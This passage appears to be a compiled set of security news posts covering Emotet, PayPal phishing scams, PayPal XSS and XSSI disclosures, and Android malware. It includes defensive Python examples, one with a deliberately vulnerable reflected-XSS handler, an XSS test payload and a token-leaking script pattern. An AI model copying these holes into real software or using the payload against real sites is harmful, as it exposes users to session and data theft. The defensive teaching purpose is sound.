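Neither rule is specific to Emotet on its own: Office-to-PowerShell fires on some legitimate macros, and the rundll32 rule fires on any loader that copies itself under a random name. Correlating the two on one host within a few minutes, which the module-loader sequence above produces naturally, is what turns them into a high-confidence alert.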

Researchers now state that the Emotet can download 16 modules judging by the recent Emotet protocol and C2 answers. They were able to recover ten of them (including two separate copies of the Spam module), which were utilized by Emotet to steal credentials, passwords, accounts, and e-mail addresses, as well as spam. We present a brief examination of these modules and also statistics on current Emotet attacks in this post. 

To gather the account details of various email clients, the current version of Emotet can create automated spam campaigns which are further spread down the network from infected devices, retrieving emails and email addresses from Thunderbird and Outlook apps and accumulating passwords from popular web browsers like Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 

Emotet infects computers in businesses and homes all around the world. As per our telemetry, Emotet most frequently targeted users from the following countries in Q1 2022: Italy (10.04%), Russia (9.87%), Japan (8.55%), Mexico (8.36%), Brazil (6.88%), Indonesia (4.92%), India (3.21%), Vietnam (2.70%), China (2.62%), Germany (2.19%) and Malaysia (2.13%). 

The present set of components is capable of a wide range of malicious activities, including stealing e-mails, passwords, and login data from a variety of sources, as well as spamming. Except for the Thunderbird components, Emotet has used all of these modules in some form or another before. However, there are still a few modules that we haven't been able to get our hands on.

Fraudsters Pose as Europol Chief in an Attempt to Steal Victims' PayPal Account Details

 

The federal police's Computer Crime Unit is looking into an identity fraud case concerning Catherine De Bolle, the executive director of Europol, the EU's law enforcement agency. Fraudsters are masquerading as the director of Europol to mislead individuals into providing their financial information. 

The European Union Agency for Law Enforcement Cooperation, better known as Europol and previously called the European Police Office and the Europol Drugs Unit, is a law enforcement agency of the European Union (EU) constituted in 1998 to manage criminal intelligence and counteract serious international organized crime and terrorism through cooperation among the competent authorities of EU member states. The agency has no executive powers, and its personnel are not authorized to detain suspects or act without prior consent from the appropriate authorities in the member states. 

According to the Brussels Times, Belgian police have received numerous reports of emails purporting to come from Catherine De Bolle, Europol's executive director. The email accuses the recipient of child pornography and sex trafficking offences before attempting to steal the recipient's PayPal account details. 

Catherine De Bolle took over as Europol's executive director in 2018, following Rob Wainwright, whose tenure ended on May 1, 2018. She was previously the top commissioner of the Belgian federal police (1 March 2012–1 May 2018) as well as the police chief of zone Ninove (2001–2012). 

Europol, which had already warned about this type of scam in April, once again asked web users not to fall for the fraud. 

“Our executive director would never contact members of the public threatening individuals with opening a criminal investigation,” tweeted Europol, which does investigate lots of actual cybercrime. 

The email is written in French; the sender introduces themselves as a COPJ – a communication by an officer of the judicial police – and begins: 

“At the request of Ms. Catherine De Bolle, Commissioner General of the Federal Police, elected to the post of Director of Europol — Brigade for the Protection of Minors (BPM), we are sending you this invitation. […] We are initiating legal proceedings against you for child pornography, pedophilia, exhibitionism, cyber pornography, and sex trafficking.” 

The email threatens the recipient with criminal prosecution if they do not respond within 72 hours. 

“After this deadline, we will be obliged to send our report to the deputy prosecutor at the high court in Créteil [a suburb of Paris] and a cybercrime specialist to establish an arrest warrant against you.” 

This is not the first time Director De Bolle's name has been used in a phishing scam. Another fraudulent email in March of this year invoked her authority, and that of her successor as commissioner-general of the federal police, Marc De Mesmaeker. 

According to the FBI's Internet Crime Complaint Center, 12,827 individuals in the United States reported being victims of "government impersonation scams" in 2020, with losses of about $110 million. 

Similarly, Check Point analysts disclosed in April 2020 that a ransomware gang was locking Android phones, accusing victims of possessing sexually explicit material and claiming that their personally identifiable information had been sent to an FBI data center.

Among the most high-profile impersonation frauds was the July 2020 incident in which fraudsters stole over $118,000 in bitcoin by hijacking more than 100 prominent Twitter accounts, including those of then-Amazon CEO Jeff Bezos and then-Democratic presidential candidate Joe Biden.

Hacker Uses Credential Phishing to Gain Access Into PayPal Account

 

Analysts from the Cofense Phishing Defense Center recently found an unusual PayPal credential phishing attack. Phishing is a technique attackers use to steal sensitive information such as banking details, credit card data, usernames, and passwords. The actors pose as legitimate parties to gain victims' trust and steal their personal information. Worse, the confidential data stolen through phishing can be used for identity theft, for financial theft through illegal access to victim accounts, or to blackmail the victims with that account access. 

Because credential phishing is generally conducted through a simple URL link, it is easy to overlook both the obvious and the subtle tactics that attackers use to steal credentials from unsuspecting victims. According to the experts, the attack isn't very sophisticated and doesn't look suspicious. Cybersecurity analyst Alex Geoghagan said that the email may pressure the victim into trying to resolve the problem quickly. The attacker didn't even bother hiding the 'from' email address, which was later identified as not actually belonging to PayPal. But the e-mail was very well put together, and few would have taken it for a fraud. 

Alex Geoghagan says "There is a “Help & Contact” link, as well as an (ironic) “Learn to identify Phishing” link in the body of the email, both leading to authentic PayPal links. Beyond the first clue in the sender email address, when hovering over the button labeled “Confirm Your Account,” it does not lead to a PayPal URL. It instead leads to a URL at direct[.]lc[.]chat. A user familiar with PayPal may notice at this point that they are being taken to a domain outside of PayPal, while the legitimate PayPal live chat is hosted within the PayPal domain and requires that you log in to use it." 

Once the fake live chat has been opened, the attacker uses automated scripts to start a conversation with the victim and tries to collect user data such as the e-mail address and credit card information. In other words, the attacker gathers enough information to appear genuine and to pass authentication. Once the information is acquired, the attacker tries to steal the victim's PayPal credentials. After that, a verification code is sent to the target via SMS to make them believe an authorised person is accessing their device. "This attack demonstrates the complexity of phishing attacks that go beyond the typical “Forms” page or spoofed login. In this case, a carefully crafted email appears to be legitimate until a recipient dives into the headers and links, which is something your average user will most likely not do," says Alex Geoghagan.
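The two clues the analyst found by hand, a sender address outside PayPal and a "Confirm Your Account" button pointing at direct.lc.chat while the help links point at paypal.com, are mechanical enough to check automatically. The following is an added example, not Cofense's code: it parses a constructed message modelled on the one described and reports every sender or link host that is not a PayPal domain (paypa1-notify.example, the chat path and the paypal.com paths are constructed placeholders; direct.lc.chat is the domain named in the post).

```python
"""Added example, not Cofense's code: flag the sender domain and every link
host in an e-mail that falls outside PayPal's domain. The message below is
constructed; only direct.lc.chat comes from the post."""
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlsplit

TRUSTED_SUFFIXES = ("paypal.com",)


def host_trusted(host: str) -> bool:
    """True only for paypal.com itself or a subdomain of it (not paypal.com.evil)."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


class LinkCollector(HTMLParser):
    """Collect (visible text, href) pairs for every <a> in the HTML body."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            text = " ".join("".join(self._text).split())
            self.links.append((text, self._href))
            self._href = None


def check_email(from_header: str, html_body: str) -> list:
    """Return human-readable findings; an empty list means nothing looked off."""
    findings = []
    _, address = parseaddr(from_header)
    sender_domain = address.rpartition("@")[2]
    if not host_trusted(sender_domain):
        findings.append(f"sender domain '{sender_domain}' is not a PayPal domain")
    parser = LinkCollector()
    parser.feed(html_body)
    for text, href in parser.links:
        host = urlsplit(href).hostname or ""
        if not host_trusted(host):
            findings.append(f"link '{text}' leads to '{host}', outside PayPal")
    return findings


# Constructed message modelled on the one described in the post; the paypal.com
# paths and the chat path are placeholders, not real URLs.
SAMPLE_FROM = '"PayPal" <service@paypa1-notify.example>'
SAMPLE_HTML = """
<p>We noticed unusual activity. Please confirm your account.</p>
<p><a href="https://direct.lc.chat/CONSTRUCTED-CHAT-ID/">Confirm Your Account</a></p>
<p><a href="https://www.paypal.com/CONSTRUCTED-HELP-PATH">Help &amp; Contact</a> |
   <a href="https://www.paypal.com/CONSTRUCTED-PHISHING-PATH">Learn to identify Phishing</a></p>
"""

if __name__ == "__main__":
    for finding in check_email(SAMPLE_FROM, SAMPLE_HTML):
        print("!", finding)
```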

Virtual Wallet Users are Being Scammed

 

People are carrying less cash as technology advances, preferring to use debit cards, credit cards, and smartphone payment apps instead. Although using virtual wallets like Venmo, PayPal, and Cash App is easy and becoming more common, there is a risk of being scammed by someone who is not who they claim to be. Virtual wallets are applications that you can download on your Android phone or iPhone to make it simple to send and receive money from friends, relatives, and other people. To move money, these apps are connected to a bank account. 

Scammers are always on the lookout for their next victim, and these apps provide them with an ideal opportunity to defraud people of their hard-earned money. Fraudsters have devised a number of strategies for intercepting payments or convincing app users to pay them directly. 

Last year, the Better Business Bureau reported on a new scheme in which con artists send messages requesting the return of unintended payments after making deposits into their victims' accounts. 

When the victim checks their account and discovers these transfers, which were made with stolen credit cards, they refund the money; by then the scammer has replaced the stolen card details with their own. The money is sent to the fraudster, and the victim is left liable when the owner of the stolen card disputes the charges. 

PayPal is the oldest of these virtual wallets, predating Cash App and Venmo. In one PayPal scam, the scammer asks a seller to send the item they "bought" to a particular address. Only after the scammer "pays" for the item and the seller ships the package does the seller discover that the address is invalid, by which point it is too late. 

If the shipping company is unable to locate the address, the item will be marked as undeliverable. The scammer would then contact the shipping company and provide a new address in order to accept the package while claiming they did not receive it. 

The scammer then collects the item and files a complaint with PayPal claiming that it was never delivered. PayPal refunds the money to the scammer because the seller has no evidence that the item was delivered. As a result, the seller loses both money and goods to the con artist. 

App developers should take action to protect their users from these types of scams. Multifactor authentication and secondary confirmation, such as emailed security codes, are examples of these safeguards. According to Microsoft research, multifactor authentication will prevent 99.9% of fraud attempts involving compromised login credentials.

PayPal Suffered Cross-Site Scripting -XSS Vulnerability

 

PayPal's currency converter functionality was affected by a severe cross-site scripting (XSS) vulnerability. An attacker able to abuse the vulnerability could run malicious scripts, injecting JavaScript, HTML, or other content the browser interprets. The bug was found on PayPal's web domain in the currency converter functionality of PayPal wallets. 

The vulnerability was first reported on February 19, 2020, as a case of "reflected XSS and CSP bypass" by a security researcher who goes by the name "Cr33pb0y"; he was awarded $2,900 through the HackerOne bug bounty program. 

In a limited disclosure released on February 10 – almost a year after the researcher reported the problem privately – PayPal said the flaw in the currency conversion endpoint was caused by a failure to adequately sanitize user input. 

In its response on HackerOne, PayPal acknowledged that the flaw stemmed from the currency conversion URL handling user input improperly. An attacker could use JavaScript injection to access document objects in the browser or append other malicious code to the URL. If attackers get a malicious payload to load in a victim's browser, they can steal data or use that foothold to take control of the system. In effect, the malicious payload executes in the victim's browser page, in the Document Object Model (DOM), without the victim's knowledge or consent. 

Typically, a reflected XSS attack injects a script into a page served by a specific website and relies on the target clicking a malicious link. Payloads can serve as the entry point for a larger attack or be used to steal cookies, session tokens, or account information. Following the bug bounty hunter's report, PayPal has now implemented further validation checks on user input in the currency exchange function to eliminate the error. 

XSS bugs are a common attack vector. Several recent data leaks have been linked to bugs of this kind, in what some analysts describe as XSS flaws. 

PayPal confirmed that the vulnerability has been fixed “by implementing additional controls to validate and sanitize user input before being returned in the response.”
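PayPal's fix, validating and sanitizing input before it is returned in the response, is the standard remedy for reflected XSS. The following is an added example, not PayPal's code: a toy currency-conversion handler written in the vulnerable shape described above (a request parameter reflected straight into the HTML) beside a hardened version that allow-lists the currency codes, parses the amount, and escapes anything it echoes back. The parameter names, rates and payload are constructed.

```python
"""Added example, not PayPal's code: a vulnerable reflected-XSS handler for a
currency converter next to a hardened one. Parameters, rates and the payload
are constructed for illustration."""
import html
import re
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs

# Constructed rates; a real service would look these up.
RATES = {("USD", "EUR"): Decimal("0.92"), ("EUR", "USD"): Decimal("1.09")}
CURRENCY_RE = re.compile(r"[A-Z]{3}")  # ISO 4217 style allow-list


def _params(query: str) -> dict:
    """First value of each query-string parameter."""
    return {k: v[0] for k, v in parse_qs(query).items()}


def render_vulnerable(query: str) -> str:
    """Reflects 'from' and 'to' straight into HTML: a reflected XSS."""
    p = _params(query)
    src, dst = p.get("from", ""), p.get("to", "")
    return f"<p>Converting {src} to {dst}</p>"


def render_hardened(query: str):
    """Allow-list the codes, parse the amount, escape anything echoed back."""
    p = _params(query)
    src, dst, amount = p.get("from", ""), p.get("to", ""), p.get("amount", "1")
    if not (CURRENCY_RE.fullmatch(src) and CURRENCY_RE.fullmatch(dst)):
        # Rejected input is never echoed, so nothing attacker-controlled reaches the page.
        return 400, "<p>Invalid currency code.</p>"
    try:
        value = Decimal(amount)
    except InvalidOperation:
        return 400, "<p>Invalid amount.</p>"
    if value <= 0 or value > Decimal("1000000"):
        return 400, "<p>Amount out of range.</p>"
    rate = RATES.get((src, dst))
    if rate is None:
        return 404, f"<p>Unsupported pair {html.escape(src)}/{html.escape(dst)}.</p>"
    converted = (value * rate).quantize(Decimal("0.01"))
    # Escaping is belt-and-braces here: the allow-list already excludes markup.
    return 200, (f"<p>{html.escape(str(value))} {html.escape(src)} = "
                 f"{converted} {html.escape(dst)}</p>")


# Constructed requests: a harmless marker payload in the 'to' parameter, and a clean one.
XSS_QUERY = "from=USD&to=<script>alert(1)</script>&amount=10"
GOOD_QUERY = "from=USD&to=EUR&amount=10"

if __name__ == "__main__":
    print(render_vulnerable(XSS_QUERY))   # payload comes back as live markup
    print(render_hardened(XSS_QUERY))     # (400, '<p>Invalid currency code.</p>')
    print(render_hardened(GOOD_QUERY))    # (200, '<p>10 USD = 9.20 EUR</p>')
```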

PayPal Phishing Scam 2021, Here's How to Stay Guarded

 


Another PayPal phishing campaign attempts to steal account logins and other personal data. Malicious actors are sending customers text messages warning them that their accounts have been permanently "limited" and urging them to sign in and verify their identity and account via a supplied link. As is typical of PayPal phishing messages, this one includes all the essential ingredients needed to deceive customers: a short claim that threatens consequences, and a fake link that redirects them to a spoofed site. 

Cybercriminals exploit users' inexperience and lack of awareness through well-known social engineering techniques. They craft emails or messages that resemble those from real organizations, which persuades victims to hand over their details readily. 

The link in the new PayPal phishing campaign redirects phone users to a spoofed webpage that looks identical to PayPal's, although the web address is noticeably different. Prospective victims are immediately asked to sign in to their accounts. They are then redirected to a page that gives a few explanations of why their account has been limited and encourages them to secure it. Next, PayPal users see another page asking them to provide their details, such as full name, date of birth, and billing address. When users fill in these details, all of them are sent to the operators behind the scam, who can use them to abuse the users' PayPal accounts, open new bank accounts, or reuse the personal data in future phishing campaigns. 

If you have been tricked into filling in these fields, take the following steps to limit the damage: 

 • Sign in to your PayPal account and change the password right away. 

 • If the same password is used to sign in to any other accounts, visit them and change it as well. 

 • Inform PayPal about the scam and that you may have been affected. 

 • To ensure no fraudulent accounts are opened in your name, place a temporary freeze on your credit report.

To stay safe, remain wary of such links and follow the organization's own guidance. Note that PayPal never sends its customers text messages forcing them to visit and sign in to its site immediately; only cybercriminals operate that way. The company only sends emails containing such information, and they always include an explanation for the limitation.

PayPal Fixes 'High-Severity' Password Security Vulnerability


Researcher Alex Birsan, while examining PayPal's main authentication flow, discovered a critical security flaw that attackers could have exploited to access users' passwords and email addresses. He responsibly reported the vulnerability to PayPal on November 18, 2019, via the HackerOne bug bounty platform and received a bounty of over $15,000 for the issue, which was acknowledged on HackerOne 18 days after submission and patched by the company on 11 December 2019. 

The bug affected one of PayPal's primary and most visited pages, its login form, as Birsan noted in his public disclosure of the flaw. 

As Birsan was exploring PayPal's main authentication flow, his attention was drawn to a JavaScript file that seemingly contained a cross-site request forgery (CSRF) token along with a session ID. "Providing any kind of session data inside a valid javascript file," the expert wrote in his blog post, "usually allows it to be retrieved by attackers." 

"In what is known as a cross-site script inclusion (XSSI) attack, a malicious web page can use an HTML <script> tag to import a script cross-origin, enabling it to gain access to any data contained within the file." 

In its confirmation, PayPal stated that sensitive, unique tokens were leaked in a JS file used by the reCAPTCHA implementation. Users sometimes have to complete a captcha challenge after authentication, and according to PayPal, "the exposed tokens were used in the post request to solve the captcha challenge." The captcha challenge appears after multiple failed login attempts, which is normal; the problem, as the disclosure describes it, is that “the response to the next authentication attempt is a page containing nothing but a Google captcha. If the captcha is solved by the user, an HTTP POST request to /auth/validatecaptcha is initiated.” However, in order to successfully obtain the credentials, the attacker would need to find a way of making targeted users visit a malicious website before logging into their PayPal account. 

While assuring its users, PayPal said that it “implemented additional controls on the security challenge request to prevent token reuse, which resolved the issue, and no evidence of abuse was found.”
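The two halves of this story, session data leaking through a script file that any origin can include, and the single-use control PayPal added on the challenge request, can be shown side by side. The following is an added example, not PayPal's or Birsan's code: the unsafe pattern described above next to a token store that binds each captcha token to a session and spends it on first use, plus a JSON delivery path that a cross-origin <script> tag cannot read. The header name, the JSON prefix and the endpoint shapes are assumptions.

```python
"""Added example, not PayPal's or Birsan's code: the XSSI-exposed pattern next
to single-use, session-bound captcha tokens. Header names, the JSON prefix and
the endpoint shapes are assumptions made for illustration."""
import json
import secrets
import time

XSSI_PREFIX = ")]}',\n"  # makes the body a syntax error if loaded as a script


def captcha_script_vulnerable(session_id: str, csrf_token: str) -> str:
    """A .js response carrying session data: readable cross-origin via <script>."""
    return (f'window.captchaConfig = {{"sessionId": "{session_id}", '
            f'"csrf": "{csrf_token}"}};')


class CaptchaTokenStore:
    """Issues tokens bound to a session that can be validated exactly once."""
    def __init__(self, ttl_seconds: int = 300):
        self._tokens = {}
        self.ttl = ttl_seconds

    def issue(self, session_id: str, now=None) -> str:
        token = secrets.token_urlsafe(32)
        self._tokens[token] = (session_id, (now or time.time()) + self.ttl)
        return token

    def consume(self, token: str, session_id: str, now=None) -> bool:
        entry = self._tokens.pop(token, None)  # pop: a second use cannot succeed
        if entry is None:
            return False
        bound_session, expires = entry
        return bound_session == session_id and (now or time.time()) < expires


def captcha_token_response(store: CaptchaTokenStore, session_id: str, headers: dict):
    """Hand the token out as JSON to same-origin XHR/fetch only, never as a script.
    A cross-origin page cannot add this custom header without a CORS preflight."""
    if headers.get("X-Requested-With") != "XMLHttpRequest":
        return 403, "text/plain", "forbidden"
    body = XSSI_PREFIX + json.dumps({"token": store.issue(session_id)})
    return 200, "application/json", body


def extract_token(body: str) -> str:
    """Client side: strip the prefix, then parse the JSON."""
    return json.loads(body[len(XSSI_PREFIX):])["token"]


def validate_captcha(store: CaptchaTokenStore, session_id: str, token: str, solved: bool) -> bool:
    """Server side of the POST /auth/validatecaptcha step: the token is spent
    whether or not the challenge was solved, so a leaked or replayed one is worthless."""
    return store.consume(token, session_id) and solved


if __name__ == "__main__":
    store = CaptchaTokenStore()
    print(captcha_script_vulnerable("SESSION-X", "TOKEN-Y"))
    _, _, body = captcha_token_response(store, "s1", {"X-Requested-With": "XMLHttpRequest"})
    tok = extract_token(body)
    print(validate_captcha(store, "s1", tok, True), validate_captcha(store, "s1", tok, True))
```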

An Android Malware's Robbing PayPal Accounts!



Security researchers have advised Android users to keep an eye on their PayPal accounts, as an Android malware has recently emerged that can easily bypass the application's security authentication.

Recently, a case was reported in which an attempt was made to steal 1,000 pounds from the victim's PayPal account.

The attacker enters the victim's PayPal account directly and easily bypasses the application's two-factor authentication (2FA). Harvesting login credentials plays no role.
 
Users who have activated two-factor authentication and those who haven't are equally susceptible to this attack.

The malware, which is reportedly distributed by third parties, primarily targets the Android PayPal app. Other malware with similar behaviour has also been uncovered.

The attacker behind it targets PayPal by abusing Android's Accessibility Services.

A research organization obtained the malware, which is distributed on third-party app stores and was disguised as a battery optimization tool called “Optimization Android”.

The Google Play Store has also been the subject of reports of other malware found on it with a similar tendency to target banking apps.

The malware's key operation is to steal money from its target's PayPal account by starting a malicious service on the victim's device.

To activate this service, the victim is asked to enable an innocuously named “Enable Statistics Service”.

If the official PayPal app is installed on the compromised device, the malware displays a notification prompting the user to launch it.

The attacker need only wait for the user to log into the app. Once that happens, the “Accessibility Service” impersonates the user's taps and transfers money from the victim's account to the attacker's PayPal address.

According to the researchers, the attack takes only seconds to complete, and in practice a user cannot stop it in time.


The currency that gets transferred depends on the victim's location. The transfer is completed within about 5 seconds.
 
The only thing that can protect the user is the state of the account balance: the attack fails if there is less balance in the account than the attacker requested and no payment cards are attached to the account.

Every time the official PayPal application is launched on the device, the malicious “Accessibility Service” is activated, leaving the device open to repeated attacks.

PayPal has been officially contacted and informed about the malicious application and the risk to its users.

Five other applications with behaviour analogous to Optimization Android have recently been uncovered on the Google Play Store.

Users who already have this app installed may well have already fallen prey to the attack.

A few users in Brazil have also come across this unfortunate attack.


Remedies And Advice From The Researchers
·         Check the application for any suspicious transactions. If any are found, contact the PayPal Resolution Center and report the issue.
·         Keep track of the PayPal account balance.
·         Change the internet banking password and the password of the connected e-mail account.
·         Boot into Android's Safe Mode and uninstall the app named “Optimization Android”.
·         Keep your devices updated.
·         Check what permissions you grant to the applications you download.
·         Only use the official Google Play Store app to download other applications.


Android Malware Steals 1,000 Euros In Around 5 Seconds Via PayPal



Another malware discovered in November, disguised as a battery enhancement application called Android Optimization, has recently come to light: it is programmed to send 1,000 euros to cyberthieves via PayPal in around 5 seconds, without the user being able to stop it.

The malware is distributed through third-party applications and is not available in the official Google Play Store.

The malware is described as one that cleverly exploits Google's Accessibility Services, intended to assist individuals with disabilities, to trick users into giving the attackers some control of the phone.

After installation, the malware asks the user for authorization to "Enable Statistics"; this allows the cybercriminals to take control of the phone remotely when the user opens certain applications, chiefly PayPal, Google Play, WhatsApp, Skype, Viber, Gmail, and various banking applications.

ESET researchers found that the malware can display to users overlay phishing pages made to look like legitimate banking applications or other well-known applications such as Gmail, WhatsApp, Skype and Viber, asking users for credit card details.

“The whole process takes about 5 seconds, and for an unsuspecting user, there is no feasible way to intervene in time. The attackers fail only if the user has insufficient PayPal balance and no payment card connected to the account. The malicious Accessibility service is activated every time the PayPal app is launched, meaning the attack could take place multiple times,” wrote ESET researcher Lukas Stefanko in a blog post.

A video by ESET showing how the malware works




Microsoft, Netflix and PayPal Emerge As the Top Targets for Phishing Attacks



Email security provider Vade Secure has released another phishing report tracking the 25 most 'spoofed' brands in North America imitated in phishing attacks. The top three are Microsoft, Netflix and PayPal.

Of all 86 brands tracked by the company for its Q3 2018 report, the top 25 account for 96%.

Bank of America and Wells Fargo are not far behind Microsoft and the other top targets, as Vade Secure reports an increase of approximately 20.4% in these phishing attacks. Attackers' focus has shifted towards cloud-based services as well as financial companies, as they attempt to obtain Office 365, OneDrive, and Azure credentials.



Vade Secure's report states - "The primary goal of Microsoft phishing attacks is to harvest Office 365 credentials. With a single set of credentials, hackers can gain access to a treasure trove of confidential files, data, and contacts stored in Office 365 apps, such as SharePoint, One Drive, Skype, Excel, CRM, etc. Moreover, hackers can use these compromised Office 365 accounts to launch additional attacks, including spear phishing, malware, and, increasingly, insider attacks targeting other users within the same organization."

In the case of Office 365 phishing emails, the attackers create a sense of urgency by claiming that the recipient's account has been suspended, prompting them to log in to resolve the issue. The hope is that victims will be less cautious when entering their credentials.

Also notable is that attackers tend to follow a pattern in which days they send the largest volume of phishing mail. According to the report, most business-related attacks happen during the week, with Tuesday and Thursday being the most popular days. For Netflix, however, the most targeted day is Sunday, when users are relaxing and catching up on television.

As these attacks become more targeted, Vade Secure’s report further states: "What should be more concerning to security professionals is that phishing attacks are becoming more targeted. When we correlated the number of phishing URLs against the number of phishing emails blocked by our filter engine, we found that the number of emails sent per URL dropped more than 64% in Q3. This suggests that hackers are using each URL in fewer emails in order to avoid reputation-based security defenses. In fact, we’ve seen sophisticated phishing attacks where each email contains a unique URL, essentially guaranteeing that they will bypass traditional email security tools."

Users, however, are advised to always examine a site before entering any login details; if the URL looks abnormal, or there is something as minor as a language error, they should report the issue directly to either the administrator or the company itself.